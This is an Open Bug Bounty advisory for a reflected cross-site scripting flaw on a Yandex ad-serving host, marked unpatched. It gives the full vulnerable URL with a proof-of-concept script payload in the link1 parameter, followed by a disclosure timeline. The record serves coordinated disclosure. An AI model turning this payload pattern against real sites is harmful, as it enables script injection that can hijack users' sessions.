awaps.yandex.net XSS vulnerability

2016-09-01T13:09:00
ID OBB:179243
Type openbugbounty
Reporter amlnspqr
Modified 2016-09-20T05:12:00

Description

Vulnerable URL:
https://awaps.yandex.net/0/c1/tVK-Oiz0m0j3O9jfnHqg-oWAMFHblrR+niH5yt1oiVbK9eDrd2yu8H2HN46xn_t05DGsPpasEd3fH6AnnwGHFuUv-DjSW+FQNzvDlD7qHKOIWrR5UXZIWnmoX1-_t-F-p-FqUnM+2wpuNyPMIMGStAaWzMtJQLetFVAHvYynlL3N73YFaIiHlD0zX_tzEhjvNKQQ6O+W+6tA7t26TWgmKRlndEa+rb0CWXIdVy9lBUmDyPZkKLHRSJT_thdUeDPtoj6hDRw7pvMcRGpydTnA8CGAWLuRPfGZQ9Ycrhj-MCVV0OoTDinBz_fsVh3DLWMOg0rxgNFiRYTYL00aTYuADgNXz+bpmVgOwAA_A_.swf?link1=data:html,%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3C/script%3E&backgroundimage;=https://avatars.yandex.net/get-bunker/e6194665f1f86fac30b0a61a4e656e0b885844cd/normal/e61946.png
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 1 September, 2016 13:09 GMT
Vulnerability existence verified and confirmed| 6 September, 2016 05:06 GMT
Generic security notifications sent to website owner| 6 September, 2016 05:06 GMT
Vulnerability details disclosed by researcher| 20 September, 2016 05:12 GMT